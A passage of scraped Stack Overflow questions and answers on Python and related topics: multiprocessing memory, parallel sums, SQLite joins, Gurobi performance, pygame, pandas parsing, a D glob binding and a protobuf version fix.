2289 ubuntu /usr/bin/python /usr/bin/sm 0 4696 5560 7160
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 30115144 30118616 30125832
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 771 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2527 2700
2284 ubuntu python test.py 0 1192 4808 12052
2290 ubuntu /usr/bin/python /usr/bin/sm 0 4700 5481 7164
2276 ubuntu python test.py 0 4092 8267 16304
2285 ubuntu python test.py 0 31823696 31827043 31834136
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 771 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2527 2700
2284 ubuntu python test.py 0 1192 4808 12052
2291 ubuntu /usr/bin/python /usr/bin/sm 0 4700 5481 7164
2276 ubuntu python test.py 0 4092 8267 16304
2285 ubuntu python test.py 0 31823696 31827043 31834136
Process Process-2:
Traceback (most recent call last):
File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
self.run()
File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
self._target(*self._args, **self._kwargs)
File "test.py", line 17, in allocate_shared_array
data=multiprocessing.Array(ctypes.c_ubyte,range(n))
File "/usr/lib/python2.7/multiprocessing/__init__.py", line 260, in Array
return Array(typecode_or_type, size_or_initializer, **kwds)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 115, in Array
obj = RawArray(typecode_or_type, size_or_initializer)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 88, in RawArray
result = _new_value(type_)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 63, in _new_value
wrapper = heap.BufferWrapper(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 243, in __init__
block = BufferWrapper._heap.malloc(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 223, in malloc
(arena, start, stop) = self._malloc(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 120, in _malloc
arena = Arena(length)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 82, in __init__
self.buffer = mmap.mmap(-1, size)
error: [Errno 12] Cannot allocate memory
Answer: From the format of your print statements, you are using Python 2.
Replace `range(n)` by `xrange(n)` to save some memory:
data=multiprocessing.Array(ctypes.c_ubyte,xrange(n))
(or use python 3)
1 billion range takes roughly 8GB (well I just tried that on my windows PC and
it froze: just don't do that!)
Tried with 10**7 instead just to be sure:
>>> z=range(int(10**7))
>>> sys.getsizeof(z)
80000064 => 80 Megs! you do the math for 10**9
A generator function like `xrange` takes no memory since it provides the
values one by one when iterated upon.
In Python 3, they must have been fed up by those problems, figured out that
most people used `range` because they wanted generators, killed `xrange` and
turned `range` into a generator. Now if you really want to allocate all the
numbers you have to to `list(range(n))`. At least you don't allocate one
terabyte by mistake!
Edit:
The OP comment means that my explanation does not solve the problem. I have
made some simple tests on my windows box:
import multiprocessing,sys,ctypes
n=10**7
a=multiprocessing.RawArray(ctypes.c_ubyte,range(n)) # or xrange
z=input("hello")
Ramps up to 500Mb then stays at 250Mb with Python 2.
Ramps up to 500Mb then stays at 7Mb with Python 3 (which is strange since it
should at least be 10Mb...).
Conclusion: ok, it peaks at 500Mb, so that's not sure it will help, but can
you try your program on Python 3 and see if you have less overall memory
peaks?
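As a side note, if you don't actually need the initial values 0..n-1, passing
just the size to `multiprocessing.Array` allocates a zero-filled shared block
directly and avoids the temporary sequence altogether:
import multiprocessing
import ctypes

n = 10**9
data = multiprocessing.Array(ctypes.c_ubyte, n)  # zero-initialized, no temporary list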
|
parallel program in python using Threads
Question: Generating the sum of the integers from 1 up to n, where n =
2000, given by the following formula: n(n+1)/2. So far I have done it serially. I
need help on how to make it compute in parallel such that it adaptively makes
use of all the available processors/cores on the host computer.
#!/usr/bin/env python3
from datetime import datetime

n = 1
v = 0
start_time = datetime.now()
while n <= 10:
    (n*(n+1)/2)
    b = (n*(n+1)/2)
    n = n+1
end_time = datetime.now()
print (b)
print('Time taken : {}'. format(end_time-start_time))
Answer: To do this, you need to use `multiprocessing`, which lets you create processes
and assign procedures to them. Here's a code snippet that does part of what
you want:
#!/usr/bin/env python3
from datetime import datetime

MAX_NUM = 10000000
NUMPROCS = 1

# LINEAR VERSION
start_time = datetime.now()

my_sum = 0
counter = 1
while counter <= MAX_NUM:
    my_sum += counter
    counter += 1

end_time = datetime.now()
print (my_sum)
print('Time taken : {}'. format(end_time-start_time))

# THREADING VERSION
from multiprocessing import Process, Queue

start_time = datetime.now()

def sum_range(start, stop, out_q):
    i = start
    counter = 0
    while i < stop:
        counter += i
        i += 1
    out_q.put(counter)

mysums = Queue()
mybounds = [1+i for i in range(0, MAX_NUM+1, int(MAX_NUM/NUMPROCS))]

myprocs = []
for i in range(NUMPROCS):
    p = Process(target=sum_range, args=(mybounds[i], mybounds[i+1], mysums))
    p.start()
    myprocs.append(p)

mytotal = 0
for i in range(NUMPROCS):
    mytotal += mysums.get()

for i in range(NUMPROCS):
    myprocs[i].join()

print(mytotal)
end_time = datetime.now()
print('Time taken : {}'. format(end_time-start_time))
Although the code doesn't adaptively use processors, it does divide the task
into a prespecified number of processes.
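As an aside, for this particular computation the closed form from the question
is O(1) and will beat any parallel scheme:
MAX_NUM = 10000000
print(MAX_NUM * (MAX_NUM + 1) // 2)  # identical result, no loop at all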
|
Find parent with certain combination of child rows - SQLite with Python
Question: There are several parts to this question. I am working with sqlite3 in Python
2.7, but I am less concerned with the exact syntax, and more with the methods
I need to use. I think the best way to ask this question is to describe my
current database design, and what I am trying to accomplish. I am new to
databases in general, so I apologize if I don't always use correct
nomenclature.
I am modeling refrigeration systems (using Modelica--not really important to
know), and I am using the database to manage input data, results data, and
models used for that data.
My top parent table is `Model`, which contains the columns:
id, name, version, date_created
My child table under `Model` is called `Design`. It is used to create a unique
id for each combination of design input parameters and the model used. the
columns it contains are:
id, model_id, date_created
I then have two child tables under `Design`, one called `Input`, and the other
called `Result`. We can just look at Input for now, since one example should
be enough. The columns for input are:
id, value, design_id, parameter_id, component_id
`parameter_id` and `component_id` are foreign keys to their own tables.The
`Parameter` table has the following columns:
id, name, units
Some example rows for `Parameter under` name are: length, width, speed,
temperature, pressure (there are many dozens more). The Component table has
the following columns:
id, name
Some example rows for `Component` under name are: compressor, heat_exchanger,
valve.
Ultimately, in my program I want to search the database for a specific design.
I want to be able to search a specific design to be able to grab specific
results for that design, or to know whether or not a model simulation with
that design has already been run previously, to avoid re-running the same data
point.
I also want to be able to grab all the parameters for a given design, and
insert it into a class I have created in Python, which is then used to provide
inputs to my models. In case it helps for solving the problem, the classes I
have created are based on the components. So, for example, I have a compressor
class, with attributes like compressor.speed, compressor.stroke,
compressor.piston_size. Each of these attributes should have their own row in
the Parameter table.
So, how would I query this database efficiently to find if there is a design
that matches a long list (let's assume 100+) of parameters with specific
values? Just as a side note, my friend helped me design this database. He
knows databases, but not my application super well. It is possible that I
designed it poorly for what I want to accomplish.
Here is a simple picture trying to map a certain combination of parameters
with certain values to a design_id, where I have taken out component_id for
simplicity:
[Picture of simplified tables](http://i.stack.imgur.com/M33DW.png)
Answer: Simply join the necessary tables. Your schema properly reflects normalization
(separating tables into logical groupings) and can scale for one-to-many
relationships. Specifically, to answer your question, _So, how would I query
this database efficiently to find if there is a design that matches a long
list (let's assume 100+) of parameters with specific values?_, consider
the approaches below:
**Inner Join with Where Clause**
For a handful of parameters, use an inner join with a `WHERE...IN()` clause.
Below returns _design_ fields joined via the _input_ and _parameters_ tables,
filtered for specific parameter names, which you can have Python pass as
parameterized values, even iteratively in a loop:
SELECT d.id, d.model_id, d.date_created
FROM design d
INNER JOIN input i ON d.id = i.design_id
INNER JOIN parameters p ON p.id = i.parameter_id
WHERE p.name IN ('param1', 'param2', 'param3', 'param4', 'param5', ...)
**Inner Join with Temp Table**
Should values number 100+ in a long list, consider a temp table that filters
the _parameters_ table to specific parameter values:
# CREATE EMPTY TABLE (SAME STRUCTURE AS parameters)
sql = "CREATE TABLE tempparams AS SELECT id, name, units FROM parameters WHERE 0;"
cur.execute(sql)
db.commit()

# ITERATIVELY APPEND TO TEMP
for i in paramslist:       # LIST OF 100+ ITEMS
    sql = "INSERT INTO tempparams (id, name, units) \
           SELECT p.id, p.name, p.units \
           FROM parameters p \
           WHERE p.name = ?;"
    cur.execute(sql, (i,)) # PARAMS MUST BE A SEQUENCE, HENCE (i,)
    db.commit()            # DB OBJECT COMMIT ACTION
Then, join the main _design_ and _input_ tables with the new temp table
holding the specific parameters:
SELECT d.id, d.model_id, d.date_created
FROM design d
INNER JOIN input i ON d.id = i.design_id
INNER JOIN tempparams t ON t.id = i.parameter_id
Same process can work with _components_ table as well.
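If a design must match _all_ searched parameters rather than any of them, the
same join can be grouped and filtered on the match count (relational division;
`:n` below is the number of searched parameters, bound from Python):
SELECT d.id, d.model_id, d.date_created
FROM design d
INNER JOIN input i ON d.id = i.design_id
INNER JOIN tempparams t ON t.id = i.parameter_id
GROUP BY d.id, d.model_id, d.date_created
HAVING COUNT(DISTINCT t.id) = :n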
|
Improve performance of constraint-adding in Gurobi (Python-Interface)
Question: i got this decision variable:
x = {}
for j in range(10):
    for i in range(500000):
        x[i,j] = m.addVar(vtype=GRB.BINARY, name="x%d%d" % (i,j))
So I need to add constraints for each x[i,j] variable like this:
for p in range(10):
    for u in range(500000):
        m.addConstr(x[u,p-1] <= x[u,p])
This is taking me so much time, more than 12hrs, and then an out-of-memory
pop-up appears on my computer. Can someone help me improve this
constraint-addition problem?
Answer: ## General Remark:
* It looks quite costly to add 5 million constraints in general
## Specific Remark:
### Approach
* You are wasting time and space by using _dictionaries_
* Despite having constant-access complexity, these constants are big
* They are also wasting memory
* In a simple 2-dimensional case like this: stick to arrays!
### Validity
* Your indexing is missing the border-case of the first element, so indexing breaks!
Try this (much more efficient approach; using numpy's arrays):
import numpy as np
from gurobipy import *

N = 10
M = 500000

m = Model("Testmodel")
x = np.empty((N, M), dtype=object)
for i in range(N):
    for j in range(M):
        x[i,j] = m.addVar(vtype=GRB.BINARY, name="x%d%d" % (i,j))
m.update()

for u in range(M):         # i switched the loop-order
    for p in range(1, N):  # i'm handling the border-case
        m.addConstr(x[p-1,u] <= x[p,u])
**Result:**
* _~2 minutes_
* _~2.5GB_ memory (complete program incl. Gurobi's internals)
|
How to sum Threads in python
Question: I need help on how I can sum all the threads, to get the sum of threads one to
three all together. The parallel program should use all processors in the host computer.
import threading
import time
from datetime import datetime

start_time = datetime.now()

def sum_number():
    summ = 100
    for num in range (1, 100):
        summ = summ + num
        num -= 1
    print ("SUM IS", summ)

def sum_number1():
    summr = 200
    for num in range (101,200):
        summr = summr + num
        num -= 1
    print ("SUM IS", summr)

def sum_number2():
    summy = 300
    for num in range (201, 300):
        summy = summy + num
        num -= 1
    print ("SUM IS", summy)

#take time t2
#end_time = datetime.now()
#print t2 - t1
#print('Time taken : {}'. format(end_time-start_time))

if __name__=="__main__":
    #sum_number()
    #sum_number1()
    #sum_number2()
    #sum_number3()
    t1 = threading.Thread(target=sum_number)
    t1.start()
    time.sleep(5)
    t2 = threading.Thread(target=sum_number1)
    t2.start()
    time.sleep(10)
    t3 = threading.Thread(target=sum_number2)
    t3.start()
    time.sleep(15)
    #end_time = datetime.now()
Answer: You can do
import time
import multiprocessing.dummy as mp  # uses threads instead of full processes

def sum_range(start_stop):
    start, stop = start_stop
    return sum(range(start, stop))

if __name__=="__main__":
    start_time = time.perf_counter()
    with mp.Pool() as p:
        my_sums = p.map(sum_range, [(1,101), (101,201), (201,301)])  # sums from 1 to 300 (including 300)
    full_sum = sum(my_sums)
    end_time = time.perf_counter()
    print("The sum is", full_sum)
    print("Calculating it took", end_time-start_time, "seconds.")
for using processes instead of threads use `import multiprocessing as mp`
In this case if you are after performance, doing the sum in a single
thread/process is much faster because you are summing so few numbers. Creating
Threads takes time and creating Processes takes much more time. (Normally
using threads does not increase computational performance with the standard
interpreter if you are not using special functions which release the "GIL")
|
Sign extending from a variable bit width
Question: Here is a code in C++:
#include <iostream>
#include <limits.h>
using namespace std;

void sign_extending(int x, unsigned b)
{
    int r;  // resulting sign-extended number
    int const m = CHAR_BIT * sizeof(x) - b;
    r = (x << m) >> m;
    cout << r;
}

void Run()
{
    unsigned b = 5;  // number of bits representing the number in x
    int x = 29;      // sign extend this b-bit number to r
    sign_extending(x, b);
}
> Result : -3
The resulting number will be a signed number with its number of bits stored in
b. I am trying to replicate this code in Python:
from ctypes import *
import os

def sign_extending(x, b):
    m = c_int(os.sysconf('SC_CHAR_BIT') * sizeof(c_int(x)) - b)
    r = c_int((x << m.value) >> m.value)  # Resulting sign-extended number
    return r.value

b = c_int(5)   # number of bits representing the number in x
x = c_int(29)  # sign extend this b-bit number to r
r = sign_extending(x.value, b.value)
print r
> Result : 29
I cannot get the sign-extended number matching the output of the C++ version. I
would like to know the error or problems in my current Python code and also a
possible solution to the issue using this technique.
Answer: you can use
def sign_extending(x, b):
if x&(1<<(b-1)): # is the highest bit (sign) set? (x>>(b-1)) would be faster
return x-(1<<b) # 2s complement
return x
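As a quick check with the values from the question:

    print(sign_extending(29, 5))  # prints -3, matching the C++ result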
|
Why is my blitted character not moving in pygame?
Question: I am making an RPG in Python using Pygame. My first step is to create my main
character and let it move. But it isn't moving. This is my code:
import pygame,random
from pygame.locals import *
pygame.init()
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
blue = (0,255,0)
green = (0,0,255)
global screen, size, winWidth, winHeight, gameExit, pressed, mainChar, x, y
size = winWidth,winHeight = (1350,668)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("RPG")
gameExit = False
pressed = pygame.key.get_pressed()
mainChar = pygame.image.load("Main Character.png")
x,y = 655,500
def surroundings():
stoneTile = pygame.image.load("Stone Tile.png")
stoneTileSize = stoneTile.get_rect()
def move():
if pressed[K_LEFT]: x -= 1
if pressed[K_RIGHT]: x += 1
if pressed[K_UP]: y -= 1
if pressed[K_DOWN]: y += 1
def player():
move()
screen.fill(black)
screen.blit(mainChar,(x,y))
while not gameExit:
for event in pygame.event.get():
if event.type == QUIT:
gameExit = True
surroundings()
move()
player()
pygame.display.update()
pygame.quit()
quit()
Please help me and explain why it isn't working, too. Thanks.
Answer: You will have to update your `pressed` variable on each iteration of the loop:
while not gameExit:
for event in pygame.event.get():
if event.type == QUIT:
gameExit = True
pressed = pygame.key.get_pressed()
surroundings()
move()
player()
pygame.display.update()
The `x` and `y` values that you use within the `move` function are treated as
local variables; you have to tell the interpreter that they are globals:
def move():
global x,y
if pressed[K_LEFT]: x -= 1
if pressed[K_RIGHT]: x += 1
if pressed[K_UP]: y -= 1
if pressed[K_DOWN]: y += 1
|
Rosalind Profile and Consensus: Writing long strings to one line in Python (Formatting)
Question: I'm trying to tackle a problem on Rosalind where, given a FASTA file of at
most 10 sequences at 1kb, I need to give the consensus sequence and profile
(how many of each base do all the sequences have in common at each
nucleotide). In the context of formatting my response, the code I have works
for small sequences (verified).
However, I have issues in formatting my response when it comes to large
sequences. What I expect to return, regardless of length, is:
"consensus sequence"
"A: one line string of numbers without commas"
"C: one line string """" "
"G: one line string """" "
"T: one line string """" "
All aligned with each other and on their own respective lines, or at least
some formatting that lets me carry this layout onward as a unit and keep the
alignment intact.
but when I run my code for a large sequence, each string below the consensus
sequence gets broken up by newlines, presumably because the string itself is
too long. I've been struggling to think of ways to circumvent the issue, but
my searches have been fruitless. I'm thinking about some iterative writing
algorithm that can write the entirety of the above expectation in chunks. Any
help would be greatly appreciated. I have attached the entirety of my code
below for the sake of completeness, with block comments as needed.
def cons(file):
#returns consensus sequence and profile of a FASTA file
import os
path = os.path.abspath(os.path.expanduser(file))
with open(path,"r") as D:
F=D.readlines()
#initialize list of sequences, list of all strings, and a temporary storage
#list, respectively
SEQS=[]
mystrings=[]
temp_seq=[]
#get a list of strings from the file, stripping the newline character
for x in F:
mystrings.append(x.strip("\n"))
#if the string in question is a nucleotide sequence (without ">")
#i'll store that string into a temporary variable until I run into a string
#with a ">", in which case I'll join all the strings in my temporary
#sequence list and append to my list of sequences SEQS
for i in range(1,len(mystrings)):
if ">" not in mystrings[i]:
temp_seq.append(mystrings[i])
else:
SEQS.append(("").join(temp_seq))
temp_seq=[]
SEQS.append(("").join(temp_seq))
#set up list of nucleotide counts for A,C,G and T, in that order
ACGT= [[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))]]
#assumed to be equal length sequences. Counting amount of shared nucleotides
#in each column
for i in range(0,len(SEQS[0])-1):
for j in range(0, len(SEQS)):
if SEQS[j][i]=="A":
ACGT[0][i]+=1
elif SEQS[j][i]=="C":
ACGT[1][i]+=1
elif SEQS[j][i]=="G":
ACGT[2][i]+=1
elif SEQS[j][i]=="T":
ACGT[3][i]+=1
ancstr=""
TR_ACGT=list(zip(*ACGT))
acgt=["A: ","C: ","G: ","T: "]
for i in range(0,len(TR_ACGT)-1):
comp=TR_ACGT[i]
if comp.index(max(comp))==0:
ancstr+=("A")
elif comp.index(max(comp))==1:
ancstr+=("C")
elif comp.index(max(comp))==2:
ancstr+=("G")
elif comp.index(max(comp))==3:
ancstr+=("T")
'''
writing to file... trying to get it to write as
consensus sequence
A: blah(1line)
C: blah(1line)
G: blah(1line)
T: blah(line)
which works for small sequences. but for larger sequences
python keeps adding newlines if the string in question is very long...
'''
myfile="myconsensus.txt"
writing_strings=[acgt[i]+' '.join(str(n) for n in ACGT[i] for i in range(0,len(ACGT))) for i in range(0,len(acgt))]
with open(myfile,'w') as D:
D.writelines(ancstr)
D.writelines("\n")
for i in range(0,len(writing_strings)):
D.writelines(writing_strings[i])
D.writelines("\n")
cons("rosalind_cons.txt")
Answer: Your code is totally fine except for this line:
writing_strings=[acgt[i]+' '.join(str(n) for n in ACGT[i] for i in range(0,len(ACGT))) for i in range(0,len(acgt))]
You accidentally replicate your data with the nested comprehension. Try replacing it with:
    writing_strings=[acgt[i] + str(ACGT[i])[1:-1] for i in range(0,len(acgt))]
and then write it to your output file as follows:
    D.writelines(writing_strings[i])
The `[1:-1]` slice is a lazy way to get rid of the brackets around the list;
add `.replace(',', '')` if you also want to drop the commas.
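For reference, a more compact way to build the profile and consensus with the standard library (a sketch, assuming equal-length sequences in `SEQS` and bases limited to ACGT):

    bases = "ACGT"
    columns = list(zip(*SEQS))  # one tuple of characters per position
    profile = {b: [col.count(b) for col in columns] for b in bases}
    consensus = "".join(max(bases, key=lambda b: profile[b][i])
                        for i in range(len(columns)))
    with open("myconsensus.txt", "w") as out:
        out.write(consensus + "\n")
        for b in bases:
            out.write(b + ": " + " ".join(str(n) for n in profile[b]) + "\n")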
|
Make console-friendly string a useable pandas dataframe python
Question: A quick question as I'm currently changing from R to pandas for some projects:
I get the following print output from `metrics.classification_report` from
`sci-kit learn`:
precision recall f1-score support
0 0.67 0.67 0.67 3
1 0.50 1.00 0.67 1
2 1.00 0.80 0.89 5
avg / total 0.83 0.78 0.79 9
I want to use this (and similar ones) as a matrix/dataframe so, that I could
subset it to extract, say the precision of class 0.
In R, I'd give the first "column" a name like 'outcome_class' and then subset
it: `my_dataframe[my_dataframe$class_outcome == 1, 'precision']`
And I can do this in pandas, but what I want to use as a dataframe is simply a
string, [see scikit-learn's doc](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.classification_report.html).
How can I turn the table output here into a usable dataframe in pandas?
Answer: Assign it to a variable, `s`:
s = classification_report(y_true, y_pred, target_names=target_names)
Or directly:
s = '''
precision recall f1-score support
class 0 0.50 1.00 0.67 1
class 1 0.00 0.00 0.00 1
class 2 1.00 0.67 0.80 3
avg / total 0.70 0.60 0.61 5
'''
Use that as the string input for StringIO:
import io # For Python 2.x use import StringIO
df = pd.read_table(io.StringIO(s), sep='\s{2,}') # For Python 2.x use StringIO.StringIO(s)
df
Out:
precision recall f1-score support
class 0 0.5 1.00 0.67 1
class 1 0.0 0.00 0.00 1
class 2 1.0 0.67 0.80 3
avg / total 0.7 0.60 0.61 5
Now you can slice it like an R data.frame:
df.loc['class 2']['f1-score']
Out: 0.80000000000000004
Here, classes are the index of the DataFrame. You can use `reset_index()` if
you want to use it as a regular column:
df = df.reset_index().rename(columns={'index': 'outcome_class'})
df.loc[df['outcome_class']=='class 1', 'support']
Out:
1 1
Name: support, dtype: int64
|
Is there an equivalent for Glob in D Phobos?
Question: In python I can use glob to search path patterns. This for instance:
import glob
for entry in glob.glob("/usr/*/python*"):
print(entry)
Would print this:
/usr/share/python3
/usr/share/python3-plainbox
/usr/share/python
/usr/share/python-apt
/usr/include/python3.5m
/usr/bin/python3
/usr/bin/python3m
/usr/bin/python2.7
/usr/bin/python
/usr/bin/python3.5
/usr/bin/python3.5m
/usr/bin/python2
/usr/lib/python3
/usr/lib/python2.7
/usr/lib/python3.5
How would I `glob` or make a glob equivalent in D?
Answer: If you only work on a Posix system, you can directly call `glob.h`. Here's a
simple example that shows how easy it is to interface with the Posix API:
void main()
{
import std.stdio;
import glob : glob;
foreach(entry; glob("/usr/*/python*"))
writeln(entry);
}
You can compile this e.g. with `rdmd main.d` (rdmd does simple dependency
management) or `dmd main.d glob.d` and it yields a similar output as yours on
my machine.
`glob.d` was generated by [dstep](https://github.com/jacob-carlborg/dstep) and
is enhanced with a convenience D-style wrapper (first function). Please note
that this isn't perfect and a better way would be to expose a range API
instead of allocating the entire array.
/* Copyright (C) 1991-2016 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
string[] glob(string pattern)
{
import std.string;
string[] results;
glob_t glob_result;
glob(pattern.toStringz, 0, null, &glob_result);
for (uint i = 0; i < glob_result.gl_pathc; i++)
{
results ~= glob_result.gl_pathv[i].fromStringz().idup;
}
globfree(&glob_result);
return results;
}
import core.stdc.config;
extern (C):
enum _GLOB_H = 1;
/* We need `size_t' for the following definitions. */
alias c_ulong __size_t;
alias c_ulong size_t;
/* The GNU CC stddef.h version defines __size_t as empty. We need a real
definition. */
/* Bits set in the FLAGS argument to `glob'. */
enum GLOB_ERR = 1 << 0; /* Return on read errors. */
enum GLOB_MARK = 1 << 1; /* Append a slash to each name. */
enum GLOB_NOSORT = 1 << 2; /* Don't sort the names. */
enum GLOB_DOOFFS = 1 << 3; /* Insert PGLOB->gl_offs NULLs. */
enum GLOB_NOCHECK = 1 << 4; /* If nothing matches, return the pattern. */
enum GLOB_APPEND = 1 << 5; /* Append to results of a previous call. */
enum GLOB_NOESCAPE = 1 << 6; /* Backslashes don't quote metacharacters. */
enum GLOB_PERIOD = 1 << 7; /* Leading `.' can be matched by metachars. */
enum GLOB_MAGCHAR = 1 << 8; /* Set in gl_flags if any metachars seen. */
enum GLOB_ALTDIRFUNC = 1 << 9; /* Use gl_opendir et al functions. */
enum GLOB_BRACE = 1 << 10; /* Expand "{a,b}" to "a" "b". */
enum GLOB_NOMAGIC = 1 << 11; /* If no magic chars, return the pattern. */
enum GLOB_TILDE = 1 << 12; /* Expand ~user and ~ to home directories. */
enum GLOB_ONLYDIR = 1 << 13; /* Match only directories. */
enum GLOB_TILDE_CHECK = 1 << 14; /* Like GLOB_TILDE but return an error
if the user name is not available. */
enum __GLOB_FLAGS = GLOB_ERR | GLOB_MARK | GLOB_NOSORT | GLOB_DOOFFS | GLOB_NOESCAPE | GLOB_NOCHECK | GLOB_APPEND | GLOB_PERIOD | GLOB_ALTDIRFUNC | GLOB_BRACE | GLOB_NOMAGIC | GLOB_TILDE | GLOB_ONLYDIR | GLOB_TILDE_CHECK;
/* Error returns from `glob'. */
enum GLOB_NOSPACE = 1; /* Ran out of memory. */
enum GLOB_ABORTED = 2; /* Read error. */
enum GLOB_NOMATCH = 3; /* No matches found. */
enum GLOB_NOSYS = 4; /* Not implemented. */
/* Previous versions of this file defined GLOB_ABEND instead of
GLOB_ABORTED. Provide a compatibility definition here. */
/* Structure describing a globbing run. */
struct glob_t
{
__size_t gl_pathc; /* Count of paths matched by the pattern. */
char** gl_pathv; /* List of matched pathnames. */
__size_t gl_offs; /* Slots to reserve in `gl_pathv'. */
int gl_flags; /* Set to FLAGS, maybe | GLOB_MAGCHAR. */
/* If the GLOB_ALTDIRFUNC flag is set, the following functions
are used instead of the normal file access functions. */
void function (void*) gl_closedir;
void* function (void*) gl_readdir;
void* function (const(char)*) gl_opendir;
int function (const(char)*, void*) gl_lstat;
int function (const(char)*, void*) gl_stat;
}
/* If the GLOB_ALTDIRFUNC flag is set, the following functions
are used instead of the normal file access functions. */
/* Do glob searching for PATTERN, placing results in PGLOB.
The bits defined above may be set in FLAGS.
If a directory cannot be opened or read and ERRFUNC is not nil,
it is called with the pathname that caused the error, and the
`errno' value from the failing call; if it returns non-zero
`glob' returns GLOB_ABEND; if it returns zero, the error is ignored.
If memory cannot be allocated for PGLOB, GLOB_NOSPACE is returned.
Otherwise, `glob' returns zero. */
int glob (
const(char)* __pattern,
int __flags,
int function (const(char)*, int) __errfunc,
glob_t* __pglob);
/* Free storage allocated in PGLOB by a previous `glob' call. */
void globfree (glob_t* __pglob);
|
Cannot build master of Tensorflow Serving
Question: I've built Tensorflow from source, CUDA 8.0, python 3.5, Ubuntu 16.04,
targeting a NVIDIA 1070, and it works fine.
> Python 3.5.2 (default, Jul 5 2016, 12:43:10) [GCC 5.4.0 20160609] on linux
> Type "help", "copyright", "credits" or "license" for more information.
>
>> > > import tensorflow as tf I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcublas.so.8.0 locally I
tensorflow/stream_executor/dso_loader.cc:108] successfully opened CUDA library
libcudnn.so.5 locally I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcufft.so.8.0 locally I
tensorflow/stream_executor/dso_loader.cc:108] successfully opened CUDA library
libcuda.so.1 locally I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcurand.so.8.0 locally
However, when I attempt to build tensorflow_serving from source, it always
fails like this:
> File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 115, in tf.app.run() File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/org_tensorflow/tensorflow/python/platform/app.py",
> line 30, in run sys.exit(main(sys.argv)) File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 111, in main Export() File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 106, in Export assets_callback=CopyAssets) File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/org_tensorflow/tensorflow/contrib/session_bundle/exporter.py",
> line 202, in init graph_any_buf.Pack(copy) AttributeError: 'Any' object has
> no attribute 'Pack'
Any help would be greatly appreciated, or I will quit my job and go work
construction.
Thanks.
Answer: Though I built protobuf from source, apparently this wasn't enough.
Steps to fix:
sudo pip uninstall protobuf
sudo pip install --upgrade protobuf==3.0.0b2
This version, and only this version, seems to work with the master for
tensorflow_serving, at least for me.
|
regarding the parameters in os.path.join
Question: I am trying to reproduce a python program, which includes the following line
of code
data = glob(os.path.join("./data", config.dataset, "*.jpg"))
My guess is that it will capture all `.jpg` files stored in the `./data`
folder. But I am not sure about the usage of `config.dataset` here. Should the
folder structure look like `./data/<config.dataset>/*.jpg`? I need to
understand this because I have to create a data input folder to run the
program. The original program does not share the details of the data
organization.
Answer: `config.dataset` in your code fragment is a variable. It's either a `dataset`
attribute of some `config` object, or the `dataset` global variable in an
imported `config` module (from this code's perspective they work the same).
As a few people have commented, for that code to work, `config.dataset` must
evaluate to a string, probably a single directory name. So the result of the
`join` call will be something like `"./data/images/*.jpg"` (if
`config.dataset` is `"images"`). The variable could also have a (pre-joined)
path section including one or more slashes. For instance, if `config.dataset`
was `"path/to/the/images"`, you'd end up with
`"./data/path/to/the/images/*.jpg"`.
|
How to call methods inside a class?
Question: I have a test Python class named calc with two methods `add` and `sub`. How
can I run the methods from the python prompt? I am at the python command line
">>>" and typing `import calc`. Then I type `calc.add(5,3)` and get "No module
named 'calc'". File name is `calc.py`.
class calc:
def add(x,y):
answer = x + y
print(answer)
def sub(x,y):
answer = x - y
print(answer)
Answer: `calc` is the module name _and_ a class in the module. Use `import calc` and
then refer to the class with `calc.calc`:
`calc.py`:
class calc:
def add(self, x, y): # note the use of "self"
answer = x + y
print(answer)
